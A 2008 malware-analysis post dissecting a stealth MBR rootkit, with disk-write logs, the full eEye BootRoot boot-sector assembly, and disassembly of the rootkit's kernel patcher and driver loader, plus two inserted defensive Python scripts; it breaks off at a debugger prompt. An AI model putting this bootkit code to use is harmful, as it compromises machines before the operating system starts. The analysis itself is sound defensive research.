Stealth MBR rootkit

Jan 2nd, 2008

In 2005 Derek Soeder and Ryan Permeh, researchers from eEye Digital Security, presented eEye BootRoot. The technique used in their project was not new and had been popular in DOS times, but they were the first to use it successfully in the Windows NT environment. The eEye researchers skipped one part: BootRoot did not hide the real content of the affected sectors the way old DOS stealth MBR viruses did, because it had only been created to show a possible way to compromise a Windows NT OS.

Unfortunately, the whole Windows NT family (including Vista) still has the same security flaw: the MBR can be modified from user mode. Microsoft did block write access to disk sectors from userland code on Vista after the pagefile attack; however, the first sectors of the disk are still unprotected!

Rootkit in the wild

At the end of 2007 a stealth MBR rootkit was discovered by MR Team members (thanks to Tammy & MJ), and it looks like this way of affecting NT systems could become more common in the near future if the MBR stays unprotected.

"Good points" of being an MBR rootkit:

  • full control of the machine boot process: the code is executed before the OS starts
  • the rootkit does not need a file: its code can live in some sectors of the disk and cannot be deleted like a usual file
  • the rootkit does not need any registry entry because it is loaded by the MBR code
  • to hide itself, the rootkit needs to control only a few sectors of the disk

How the MBR rootkit works:

  • Installer
  • MBR loader
  • Kernel patcher
  • Kernel driver loader
  • Sectors hider/protector
  • Kernel driver
  • Detection
  • Rootkit removal

    Installer


    The rootkit installer writes the content of the malicious kernel driver (244 736 bytes) to the last sectors of the disk (offset: 2 142 830 592) and then modifies sectors 0 (MBR), 60, 61 and 62.

    The content of the hidden sectors:

  • 0 - MBR rootkit loader
  • 61 - kernel part of loader
  • 62 - copy of original MBR

    Below, the "Process Monitor" log shows the sectors modified by the rootkit installer:

    "39680","10:43:34,1365132","ldo2.tmp","848","CreateFile","\Device\Harddisk0\DR0","SUCCESS","Desired Access: Generic Read/Write, Disposition: Open, OpenResult: Opened"
    "39688","10:43:34,1419365","ldo2.tmp","848","DeviceIoControl","\Device\Harddisk0\DR0","FAST IO DISALLOWED","Control: IOCTL_DISK_GET_DRIVE_GEOMETRY"
    "39689","10:43:34,1419952","ldo2.tmp","848","DeviceIoControl","\Device\Harddisk0\DR0","SUCCESS","Control: IOCTL_DISK_GET_DRIVE_GEOMETRY"
    "39690","10:43:34,1424517","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 0, Length: 512, I/O Flags: Non-cached"
    
    "39769","10:43:34,2424965","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 830 592, Length: 512, I/O Flags: Non-cached"
    "39770","10:43:34,2492468","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 831 104, Length: 512, I/O Flags: Non-cached"
    "39771","10:43:34,2495318","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 831 616, Length: 512, I/O Flags: Non-cached"
    ...
    "40463","10:43:34,5546049","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 143 185 408, Length: 512, I/O Flags: Non-cached"
    
    "40679","10:43:34,7473241","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 30 720, Length: 512, I/O Flags: Non-cached"
    
    "40692","10:43:34,7854862","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 232, Length: 512, I/O Flags: Non-cached"
    
    "40705","10:43:34,7947558","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 744, Length: 512, I/O Flags: Non-cached"
    
    "40718","10:43:34,8035200","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 830 592, Length: 244 736, I/O Flags: Non-cached"
    "40719","10:43:34,8152900","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 30 720, Length: 512, I/O Flags: Non-cached"
    "40720","10:43:34,8252619","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 232, Length: 512, I/O Flags: Non-cached"
    "40721","10:43:34,8265515","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 744, Length: 512, I/O Flags: Non-cached"
    "40722","10:43:34,8277706","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 0, Length: 512, I/O Flags: Non-cached"
    
    
    "40729","10:43:34,8335180","ldo2.tmp","848","CloseFile","\Device\Harddisk0\DR0","SUCCESS",""
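
The same log can be checked mechanically. The script below is an added example (not part of the original analysis and not rootkit code): it parses Process Monitor's CSV export, keeps successful WriteFile operations on a raw physical-drive device (\Device\HarddiskN\DRn), converts the byte offsets to sector numbers and labels writes to sector 0 and to the unpartitioned first track. The sample lines are a subset of the log above; the 63-sector first track and the space-grouped digits in the Offset/Length fields are assumptions about the disk layout and the log's locale.

```python
import csv
import io
import re

# Sector size reported for \Device\Harddisk0\DR0 in the kd output further down (SectorSize : 0x200)
SECTOR_SIZE = 512
# Assumption: first partition starts at LBA 63, so sectors 0..62 are the MBR and the
# unpartitioned track the installer writes into (sectors 60, 61, 62)
FIRST_TRACK_SECTORS = 63

# Raw physical-drive device objects as they appear in Process Monitor's Path column
RAW_DISK_RE = re.compile(r"\\Device\\Harddisk\d+\\DR\d+$", re.IGNORECASE)
# Detail text; digits are grouped with spaces in the log above ("2 142 830 592")
DETAIL_RE = re.compile(r"Offset:\s*([\d \xa0]+),\s*Length:\s*([\d \xa0]+)")

# Constructed sample: a subset of the Process Monitor lines shown above, same column layout
SAMPLE_LOG = r'''"39680","10:43:34,1365132","ldo2.tmp","848","CreateFile","\Device\Harddisk0\DR0","SUCCESS","Desired Access: Generic Read/Write, Disposition: Open, OpenResult: Opened"
"39690","10:43:34,1424517","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 0, Length: 512, I/O Flags: Non-cached"
"40718","10:43:34,8035200","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 830 592, Length: 244 736, I/O Flags: Non-cached"
"40719","10:43:34,8152900","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 30 720, Length: 512, I/O Flags: Non-cached"
"40720","10:43:34,8252619","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 232, Length: 512, I/O Flags: Non-cached"
"40721","10:43:34,8265515","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 744, Length: 512, I/O Flags: Non-cached"
"40722","10:43:34,8277706","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 0, Length: 512, I/O Flags: Non-cached"
"40729","10:43:34,8335180","ldo2.tmp","848","CloseFile","\Device\Harddisk0\DR0","SUCCESS",""
'''


def parse_events(text):
    """Turn Process Monitor CSV text into dicts, keeping only the columns used here."""
    events = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 8:
            continue
        _seq, _time, process, pid, operation, path, result, detail = row[:8]
        events.append({"process": process, "pid": int(pid), "operation": operation,
                       "path": path, "result": result, "detail": detail})
    return events


def classify_sectors(first, last):
    """Label a sector range by how sensitive it is on an MBR-partitioned disk."""
    if first == 0:
        return "mbr"
    if last < FIRST_TRACK_SECTORS:
        return "first-track"
    return "other"


def raw_disk_writes(text):
    """Return every successful WriteFile to a raw physical-drive device, with sector numbers."""
    findings = []
    for ev in parse_events(text):
        if ev["operation"] != "WriteFile" or ev["result"] != "SUCCESS":
            continue
        if not RAW_DISK_RE.search(ev["path"]):
            continue
        m = DETAIL_RE.search(ev["detail"])
        if not m:
            continue
        offset = int(re.sub(r"\D", "", m.group(1)))   # drop the grouping spaces
        length = int(re.sub(r"\D", "", m.group(2)))
        first = offset // SECTOR_SIZE
        last = (offset + length - 1) // SECTOR_SIZE
        findings.append({"process": ev["process"], "pid": ev["pid"], "offset": offset,
                         "length": length, "first_sector": first, "last_sector": last,
                         "area": classify_sectors(first, last)})
    return findings


def report(findings):
    """One line per raw write: who wrote how much to which sectors."""
    return [f"{f['process']}[{f['pid']}] wrote {f['length']} bytes at sectors "
            f"{f['first_sector']}-{f['last_sector']} ({f['area']})" for f in findings]


if __name__ == "__main__":
    for line in report(raw_disk_writes(SAMPLE_LOG)):
        print(line)
```

On the sample this yields one large write outside the first track (the driver body, 478 sectors) and four single-sector writes to sectors 60, 61, 62 and 0, which is the whole footprint the text describes; any user-mode process matching that pattern is worth an alert on its own.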
    

    MBR loader


    The rootkit dropper overwrites the original MBR code and stores a copy of it in sector 62. The author of the rootkit mostly reused the MBR loader code developed by the eEye researchers; however, the original code has been modified to patch the Windows kernel instead of the NDIS driver.

    rootkit MBR code

    original eEye MBR code

    ;===============================================================
    ; eEye BootRoot v0.90                  Last updated: 08/08/2005
    ;---------------------------------------------------------------
    ; Demonstration of the capabilities of custom boot sector code
    ; on a Windows NT-family system.
    ;
    ; Derek Soeder - eEye Digital Security - 04/02/2005
    ;===============================================================
    .486p
    .model tiny
    BOOTORG EQU 7C00h						; our code is executed by the BIOS at 0000h:7C00h
    BOOTROOT_SIZE EQU 200h
    BOOTROOT GROUP BRCODE16, BRDATA
    ASSUME CS:BOOTROOT, DS:BOOTROOT, ES:BOOTROOT, SS:BOOTROOT
    BRCODE16 SEGMENT byte use16
    @BRCODE16_START EQU $
    ;###################################
    ;##  Boot-Time Installation Code  ##
    ;###################################
    	;
    	; Initialization
    	;
    
    	cli
    	xor		bx, bx
    	mov		ss, bx
    	mov		ss:[BOOTORG - 2], sp
    	mov		sp, (BOOTORG - 2)
    	push		ds
    	pushad
    
    	mov		ds, bx
    	; Reserve 1KB conventional memory for our memory-resident code
    	dec		word ptr ds:[0413h]			; 0040h:0013h - base memory size in KBs
    	mov		ax, ds:[0413h]
    	shl		ax, (10-4)				; AX *= 1024 / 16 (convert linear address in KBs to a segment)
    
    	mov		es, ax
    	; Copy ourselves to reserved memory and initialize the rest to zeroes
    	cld
    	mov		si, BOOTORG
    	xor		di, di
    	mov		cx, BOOTROOT_SIZE / 2
    	rep movsw
    	xor		ax, ax
    	mov		ch, (1024 - BOOTROOT_SIZE) / 2 / 100h
    	rep stosw
    
     
    	; Install our INT 13h hook
    	mov		eax, ds:[bx + (13h*4)]
    	mov		es:[INT13HANDLER - @BRCODE16_START], eax	; store previous handler
    	mov		word ptr [bx + (13h*4)], @Int13Hook	; point INT 13h vector to our hook handler
    	mov		[bx + (13h*4) + 2], es			; (BX = 0 from earlier)
    	; Load and execute MBR from first hard drive (do this from resident code)
    	push		es
    	push		@BootFromHDD
    	retf
    @BootFromHDD:
    	sti
    	mov		es, cx					; CX = 0 from above REP STOSW
    	mov		ax, 0201h				; AL = number of sectors
    	inc		cx					; CH = cylinder; CL = sector and high bits of cylinder
    	mov		dx, 0080h				; DH = head; DL = drive number
    	mov		bh, (BOOTORG / 100h)			; ES:BX -> destination buffer
    	int		13h					; INT 13h/AH=02h: Read sector(s) into memory
    	popad
    	pop		ds
    	pop		sp
    	db		0EAh					; JMP FAR 0000h:7C00h
    	dw		BOOTORG, 0000h
    
    
    
    ;##################################
    ;##  INT 13h Hook Real-Mode ISR  ##
    ;##################################
    @Int13Hook:
    	pushf
    	cmp		ah, 42h					; IBM/MS INT 13 Extensions - EXTENDED READ
    	je		short @Int13Hook_ReadRequest
    	cmp		ah, 02h					; DISK - READ SECTOR(S) INTO MEMORY
    	je		short @Int13Hook_ReadRequest
    	popf
    	db		0EAh					; JMP FAR INT13HANDLER
    INT13HANDLER EQU $
    	dd		?
    @Int13Hook_ReadRequest:
    	mov		byte ptr cs:[INT13LASTFUNCTION], ah
    	; Invoke original handler to perform read operation
    	popf
    	pushf							; push Flags because we're simulating an INT
    	call		dword ptr cs:[INT13HANDLER]		; call original handler
    	jc		short @Int13Hook_ret			; abort immediately if read failed
    	pushf
    	cli
    	push		es
    	pusha
    	mov		ah, 00h
    INT13LASTFUNCTION EQU $-1
    	cmp		ah, 42h
    	jne		short @Int13Hook_notextread
    	lodsw
    	lodsw							; +02h  WORD    number of blocks to transfer
    	les		bx, [si]				; +04h  DWORD   transfer buffer
    @Int13Hook_notextread:
    	; Scan sector for a signature of the code we want to modify
    	test		al, al
    	jle		short @Int13Hook_scan_done
    	cld
    	mov		cl, al
    	mov		al, 8Bh
    	shl		cx, 9					; (AL * 200h)
    	mov		di, bx
      @Int13Hook_scan_loop:
    								; 8B F0       MOV ESI, EAX
    								; 85 F6       TEST ESI, ESI
    								; 74 21       JZ $+23h
    								; 80 3D ...   CMP BYTE PTR [ofs32], imm8
    								; (the first 6 bytes of this signature exist in other modules!)
    	repne scasb
    	jne		short @Int13Hook_scan_done
    	cmp		dword ptr es:[di], 74F685F0h
    	jne		short @Int13Hook_scan_loop
    	cmp		word ptr es:[di+4], 8021h
    	jne		short @Int13Hook_scan_loop
    	mov		word ptr es:[di-1], 15FFh		; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32]
    	mov		eax, cs
    	shl		eax, 4
    	add		cs:[(NDISBACKDOOR_LINEAR - @BRPATCHFUNC32_START) + BRCODE16_SIZE], eax
    	add		ax, (@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE
    	mov		cs:[PATCHFUNC32_LINEAR], eax		; should be okay to add to AX, since we can't cross 1KB boundary
    	add		ax, PATCHFUNC32_LINEAR - ((@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE)
    	mov		es:[di+1], eax
    @Int13Hook_scan_done:
    	popa
    	pop		es
    	popf
    @Int13Hook_ret:
    	retf 2							; discard saved Flags from original INT (pass back CF, etc.)
    
    @BRCODE16_END EQU $
    BRCODE16_SIZE EQU (@BRCODE16_END - @BRCODE16_START)
    BRCODE16 ENDS
    

    Kernel patcher


    The MBR rootkit loader hooks INT 0x13 to control the content of the sectors loaded by NTLDR. It patches two areas of the kernel: the first contains the call to the nt!IoInitSystem function, and the second is the last page of the kernel image. At the beginning of start-up the rootkit calls the original nt!IoInitSystem function and then loads its own driver.

    start    end        module name
    804d7000 806ebc80   nt         
    806ebe00 806ebfff   rootkit code
    806ec000 806ffd80   hal        
    

    Patched kernel code (first listing) and original kernel code (second listing); the two listings differ only in the call at 806a0aab:

    806a0a79 0f85d9dcffff     jne     nt!Phase1Initialization+0x942 (8069e758)
    806a0a7f e8f9650100       call    nt!ExInitSystemPhase2 (806b707d)
    806a0a84 6a19             push    0x19
    806a0a86 e83af1e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
    806a0a8b ffb590fbffff     push    dword ptr [ebp-0x470]
    806a0a91 891d78cb5480     mov     [nt!KdpTimeSlipPending (8054cb78)],ebx
    806a0a97 e8cef30000       call    nt!XIPInit (806afe6a)
    806a0a9c 6a4b             push    0x4b
    806a0a9e 6a19             push    0x19
    806a0aa0 e83cf1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
    806a0aa5 ffb590fbffff     push    dword ptr [ebp-0x470]
    
    806a0aab e850b30400       call    806ebe00
    
    806a0ab0 84c0             test    al,al
    806a0ab2 0f84e7dcffff     je      nt!Phase1Initialization+0x9b9 (8069e79f)
    806a0ab8 6a64             push    0x64
    806a0aba 53               push    ebx
    806a0abb e821f1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
    806a0ac0 391d007f5580     cmp     [nt!InitSafeBootMode (80557f00)],ebx
    806a0ac6 be3f000f00       mov     esi,0xf003f
    806a0acb 0f85d5dcffff     jne     nt!Phase1Initialization+0x9d9 (8069e7a6)
    806a0ad1 381d142b5580     cmp     [nt!InitIsWinPEMode (80552b14)],bl
    806a0ad7 0f8563deffff     jne     nt!Phase1Initialization+0xb76 (8069e940)
    806a0add 8bb590fbffff     mov     esi,[ebp-0x470]
    806a0ae3 56               push    esi
    806a0ae4 6a02             push    0x2
    806a0ae6 e82c020000       call    nt!MmInitSystem (806a0d17)
    806a0aeb 6a50             push    0x50
    806a0aed e8d3f0e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
    806a0af2 e8fb070000       call    nt!KeI386VdmInitialize (806a12f2)
    806a0af7 e8f11e0000       call    nt!KiLogMcaErrors (806a29ed)
    806a0afc 6a01             push    0x1
    806a0afe e85cf1ffff       call    nt!PoInitSystem (8069fc5f)
    806a0b03 84c0             test    al,al
    806a0b05 0f8419daffff     je      nt!Phase1Initialization+0x259 (8069e524)
    806a0b0b 56               push    esi
    
    806a0a79 0f85d9dcffff     jne     nt!Phase1Initialization+0x942 (8069e758)
    806a0a7f e8f9650100       call    nt!ExInitSystemPhase2 (806b707d)
    806a0a84 6a19             push    0x19
    806a0a86 e83af1e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
    806a0a8b ffb590fbffff     push    dword ptr [ebp-0x470]
    806a0a91 891d78cb5480     mov     [nt!KdpTimeSlipPending (8054cb78)],ebx
    806a0a97 e8cef30000       call    nt!XIPInit (806afe6a)
    806a0a9c 6a4b             push    0x4b
    806a0a9e 6a19             push    0x19
    806a0aa0 e83cf1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
    806a0aa5 ffb590fbffff     push    dword ptr [ebp-0x470]
    
    806a0aab e844e6ffff       call    nt!IoInitSystem (8069f0f4)
    
    806a0ab0 84c0             test    al,al
    806a0ab2 0f84e7dcffff     je      nt!Phase1Initialization+0x9b9 (8069e79f)
    806a0ab8 6a64             push    0x64
    806a0aba 53               push    ebx
    806a0abb e821f1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
    806a0ac0 391d007f5580     cmp     [nt!InitSafeBootMode (80557f00)],ebx
    806a0ac6 be3f000f00       mov     esi,0xf003f
    806a0acb 0f85d5dcffff     jne     nt!Phase1Initialization+0x9d9 (8069e7a6)
    806a0ad1 381d142b5580     cmp     [nt!InitIsWinPEMode (80552b14)],bl
    806a0ad7 0f8563deffff     jne     nt!Phase1Initialization+0xb76 (8069e940)
    806a0add 8bb590fbffff     mov     esi,[ebp-0x470]
    806a0ae3 56               push    esi
    806a0ae4 6a02             push    0x2
    806a0ae6 e82c020000       call    nt!MmInitSystem (806a0d17)
    806a0aeb 6a50             push    0x50
    806a0aed e8d3f0e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
    806a0af2 e8fb070000       call    nt!KeI386VdmInitialize (806a12f2)
    806a0af7 e8f11e0000       call    nt!KiLogMcaErrors (806a29ed)
    806a0afc 6a01             push    0x1
    806a0afe e85cf1ffff       call    nt!PoInitSystem (8069fc5f)
    806a0b03 84c0             test    al,al
    806a0b05 0f8419daffff     je      nt!Phase1Initialization+0x259 (8069e524)
    806a0b0b 56               push    esi
    
    806ebd60 85 0c fe f8 ff 83 f8 10 0f 82 de fd f8 ff 83 7e  ...............~
    806ebd70 0c 00 0f 85 f9 fd f8 ff e9 cf fd f8 ff e9 eb fd  ................
    806ebd80 f8 ff 8b cf e8 07 64 ef ff e9 ed fd f8 ff 80 7d  ......d........}
    806ebd90 ff 00 0f 84 f0 fd f8 ff 8b 45 08 8b 40 0c 85 c0  .........E..@...
    806ebda0 0f 84 ee 88 fa ff 8b 40 08 85 c0 0f 84 e3 88 fa  .......@........
    806ebdb0 ff 6a 01 50 e8 8c 0d f0 ff e9 d6 88 fa ff ff 75  .j.P...........u
    806ebdc0 f8 8d 85 cc fe ff ff 50 e8 36 a3 f4 ff e9 c8 fd  .......P.6......
    806ebdd0 f8 ff 64 a1 24 01 00 00 ff 80 d4 00 00 00 0f 85  ..d.$...........
    806ebde0 cc fd f8 ff 8d 48 34 39 09 0f 84 c1 fd f8 ff b1  .....H49........
    806ebdf0 01 c6 40 49 01 ff 15 54 06 40 00 e9 b0 fd f8 ff  ..@I...T.@......
    806ebe00 8b 14 24 68 f4 f0 69 80 8b 0c 24 68 00 70 4d 80  ..$h..i...$h.pM.  <--- hooked nt!IoInitSystem
    806ebe10 0f 20 c0 50 25 ff ff fe ff 0f 22 c0 2b ca 58 0f  . .P%.....".+.X.
    806ebe20 22 c0 ff 34 24 68 62 e0 07 37 e8 3b 00 00 00 59  "..4$hb..7.;...Y
    806ebe30 59 68 ab 01 00 00 6a 00 ff d0 60 e8 00 00 00 00  Yh....j...`.....
    806ebe40 5e 83 c6 15 8b f8 6a 6a 59 f3 a5 b1 80 8d be 00  ^.....jjY.......
    806ebe50 fe ff ff ff e0 33 c0 61 ff 74 24 0c ff 54 24 08  .....3.a.t$..T$.
    806ebe60 59 5a 60 87 cd e8 52 00 00 00 60 8b 6c 24 28 8b  YZ`...R...`.l$(.
    806ebe70 45 3c 8b 54 05 78 03 d5 8b 4a 18 8b 5a 20 03 dd  E<.T.x...J..Z ..
    806ebe80 e3 32 49 8b 34 8b 03 f5 33 ff fc 33 c0 ac 3a c4  .2I.4...3..3..:.
    806ebe90 74 07 c1 cf 0d 03 f8 eb f2 3b 7c 24 24 75 e1 8b  t........;|$$u..
    806ebea0 5a 24 03 dd 66 8b 0c 4b 8b 5a 1c 03 dd 8b 04 8b  Z$..f..K.Z......
    806ebeb0 03 c5 eb 02 33 c0 89 44 24 1c 61 c3 5b 55 68 b8  ....3..D$.a.[Uh.
    806ebec0 74 29 85 ff d3 33 d2 52 52 8b f4 52 8b fc e8 26  t)...3.RR..R...&
    806ebed0 00 00 00 5c 00 3f 00 3f 00 5c 00 50 00 68 00 79  ...\.?.?.\.P.h.y
    806ebee0 00 73 00 69 00 63 00 61 00 6c 00 44 00 72 00 69  .s.i.c.a.l.D.r.i
    806ebef0 00 76 00 65 00 30 00 00 00 68 24 00 26 00 8b cc  .v.e.0...h$.&...
    806ebf00 52 52 6a 40 51 52 6a 18 8b cc 6a 20 6a 03 56 51  RRj@QRj...j j.VQ
    806ebf10 68 00 00 10 80 57 ff d0 55 68 62 e0 07 37 ff d3  h....W..Uhb..7..
    806ebf20 97 55 68 16 d5 fc 84 ff d3 89 06 68 00 00 00 00  .Uh........h....
    806ebf30 68 00 00 b9 7f 8b cc 6a 00 51 b9 00 bc 03 00 51  h......j.Q.....Q
    806ebf40 51 6a 00 ff d7 50 56 8b ce 96 33 d2 52 52 52 ff  Qj...PV...3.RRR.
    806ebf50 74 24 58 ff 11 55 68 5f 4c d4 dc ff d3 ff 74 24  t$X..Uh_L.....t$
    806ebf60 40 ff d0 8b 46 3c 03 c6 50 8b 50 50 52 52 6a 00  @...F<..P.PPRRj.
    806ebf70 ff d7 97 59 57 32 c0 f3 aa 5f 58 60 8b 48 54 f3  ...YW2..._X`.HT.
    806ebf80 a4 61 2b c6 03 c7 0f b7 48 06 8d 90 f8 00 00 00  .a+.....H.......
    806ebf90 60 03 72 14 03 7a 0c 8b 4a 10 e3 02 f3 a4 61 83  `.r..z..J.....a.
    806ebfa0 c2 28 e2 ec 50 60 8b fe 91 b9 00 ef 00 00 f3 ab  .(..P`..........
    806ebfb0 61 55 68 1f 9d 48 9d ff d3 95 56 ff d5 8b 74 24  aUh..H....V...t$
    806ebfc0 08 ff b4 24 84 00 00 00 57 8b 46 28 03 c7 ff d0  ...$....W.F(....
    806ebfd0 0b c0 7d 0e 8b 4e 50 e3 09 32 c0 57 f3 aa 5f 57  ..}..NP..2.W.._W
    806ebfe0 ff d5 83 c4 60 33 c0 8b fb 83 ef 15 b9 9c 01 00  ....`3..........
    806ebff0 00 f3 aa 61 c2 04 00 00 00 00 00 00 00 00 00 00  ...a............
    806ec000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00  MZ..............  <--- 806ec000 806ffd80 hal
    806ec010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
    806ec020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    806ec030 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00  ................
    806ec040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68  ........!..L.!Th
    806ec050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f  is program canno
    806ec060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20  t be run in DOS 
    806ec070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00  mode....$.......
    
    806ebe00 8b1424           mov     edx,[esp]
    806ebe03 68f4f06980       push    0x8069f0f4
    806ebe08 8b0c24           mov     ecx,[esp]
    806ebe0b 6800704d80       push    0x804d7000
    806ebe10 0f20c0           mov     eax,cr0
    806ebe13 50               push    eax
    806ebe14 25fffffeff       and     eax,0xfffeffff
    806ebe19 0f22c0           mov     cr0,eax			; disable code write protection
    806ebe1c 2bca             sub     ecx,edx
    806ebe1e 58               pop     eax
    806ebe1f 0f22c0           mov     cr0,eax
    806ebe22 ff3424           push    dword ptr [esp]
    806ebe25 6862e00737       push    0x3707e062
    806ebe2a e83b000000       call    806ebe6a
    806ebe2f 59               pop     ecx
    806ebe30 59               pop     ecx
    806ebe31 68ab010000       push    0x1ab
    806ebe36 6a00             push    0x0
    806ebe38 ffd0             call    eax {nt!ExAllocatePool (8050fd66)}
    806ebe3a 60               pushad
    806ebe3b e800000000       call    806ebe40
    806ebe40 5e               pop     esi
    806ebe41 83c615           add     esi,0x15
    806ebe44 8bf8             mov     edi,eax
    806ebe46 6a6a             push    0x6a
    806ebe48 59               pop     ecx
    806ebe49 f3a5             rep     movsd
    806ebe4b b180             mov     cl,0x80
    806ebe4d 8dbe00feffff     lea     edi,[esi-0x200]
    806ebe53 ffe0             jmp     eax {81bf06d0}
    
    81bf06d0 33c0             xor     eax,eax
    81bf06d2 61               popad
    81bf06d3 ff74240c         push    dword ptr [esp+0xc]
    81bf06d7 ff542408         call dword ptr [esp+0x8]{nt!IoInitSystem (8069f0f4)} ss:0010:f9e6383c=8069f0f4
    81bf06db 59               pop     ecx
    81bf06dc 5a               pop     edx
    81bf06dd 60               pushad
    81bf06de 87cd             xchg    ebp,ecx
    81bf06e0 e852000000       call    81bf0737
    81bf06e5 60               pushad
    81bf06e6 8b6c2428         mov     ebp,[esp+0x28]
    81bf06ea 8b453c           mov     eax,[ebp+0x3c]
    81bf06ed 8b540578         mov     edx,[ebp+eax+0x78]
    81bf06f1 03d5             add     edx,ebp
    81bf06f3 8b4a18           mov     ecx,[edx+0x18]
    81bf06f6 8b5a20           mov     ebx,[edx+0x20]
    81bf06f9 03dd             add     ebx,ebp
    81bf06fb e332             jecxz   81bf072f
    81bf06fd 49               dec     ecx
    81bf06fe 8b348b           mov     esi,[ebx+ecx*4]
    81bf0701 03f5             add     esi,ebp
    81bf0703 33ff             xor     edi,edi
    81bf0705 fc               cld
    81bf0706 33c0             xor     eax,eax
    81bf0708 ac               lodsb
    81bf0709 3ac4             cmp     al,ah
    81bf070b 7407             jz      81bf0714
    81bf070d c1cf0d           ror     edi,0xd
    81bf0710 03f8             add     edi,eax
    81bf0712 ebf2             jmp     81bf0706
    81bf0714 3b7c2424         cmp     edi,[esp+0x24]
    81bf0718 75e1             jnz     81bf06fb
    81bf071a 8b5a24           mov     ebx,[edx+0x24]
    81bf071d 03dd             add     ebx,ebp
    81bf071f 668b0c4b         mov     cx,[ebx+ecx*2]
    81bf0723 8b5a1c           mov     ebx,[edx+0x1c]
    81bf0726 03dd             add     ebx,ebp
    81bf0728 8b048b           mov     eax,[ebx+ecx*4]
    81bf072b 03c5             add     eax,ebp
    81bf072d eb02             jmp     81bf0731
    81bf072f 33c0             xor     eax,eax
    81bf0731 8944241c         mov     [esp+0x1c],eax
    81bf0735 61               popad
    81bf0736 c3               ret
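
The routine at 81bf06e5-81bf0736 walks the kernel's export table and hashes each name with a rotate-right-by-13-and-add loop (81bf0706-81bf0712), comparing the result with the constant its caller pushed. The Python below is an added example, not code from the page or from the rootkit: it reimplements that hash so an analyst can turn the constants in the listing back into export names. The candidate list is an assumption taken from the debugger's annotations at the call sites; against a real kernel one would feed it every exported name.

```python
ROR_BITS = 13
MASK32 = 0xFFFFFFFF


def ror13_hash(name):
    """Hash an export name the way the loop at 81bf0706-81bf0712 does: for every byte
    up to the terminating NUL, rotate the accumulator right by 13 and add the byte."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> ROR_BITS) | (h << (32 - ROR_BITS))) & MASK32   # ror edi,0xd
        h = (h + b) & MASK32                                        # add edi,eax
    return h


def resolve(hash_value, candidates):
    """Return the candidate export whose ror13 hash equals hash_value, or None.
    The stub does the same walk over AddressOfNames, from the last name backwards."""
    for name in candidates:
        if ror13_hash(name) == hash_value:
            return name
    return None


def resolve_all(hashes, candidates):
    """Map every hash constant found in a listing to a name (or None)."""
    return {h: resolve(h, candidates) for h in hashes}


# The four constants pushed before 'call ebx {81bf06e5}' in the listings on this page
HASHES_FROM_LISTING = [0x3707E062, 0x84FCD516, 0xDCD44C5F, 0x9D489D1F]

# Assumed candidate set: the export names the debugger annotated at the call sites
# that consume the resolved pointers. A real resolver would use the whole export table.
CANDIDATES = ["ExAllocatePool", "ExFreePool", "NtOpenFile", "NtReadFile", "NtClose"]


if __name__ == "__main__":
    for h, name in resolve_all(HASHES_FROM_LISTING, CANDIDATES).items():
        print(f"0x{h:08x} -> {name}")
```

The same hash style shows up in a lot of shellcode, so the function is reusable beyond this sample; the point for detection is that a kernel-mode stub resolving nt! exports by hash, with no import table, is itself a strong indicator when found in a memory dump.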
    

    Kernel driver loader


    The main part of the rootkit loader opens "\??\PhysicalDrive0" and reads the content of the malicious kernel driver from the disk. The rootkit uses its own procedure to load the image sections into memory, and in the last stage the loader calls the driver's entry point.

    81bf077f 51               push    ecx
    81bf0780 52               push    edx
    81bf0781 6a18             push    0x18
    81bf0783 8bcc             mov     ecx,esp
    81bf0785 6a20             push    0x20
    81bf0787 6a03             push    0x3
    81bf0789 56               push    esi
    81bf078a 51               push    ecx
    81bf078b 6800001080       push    0x80100000
    81bf0790 57               push    edi
    
    kd> r
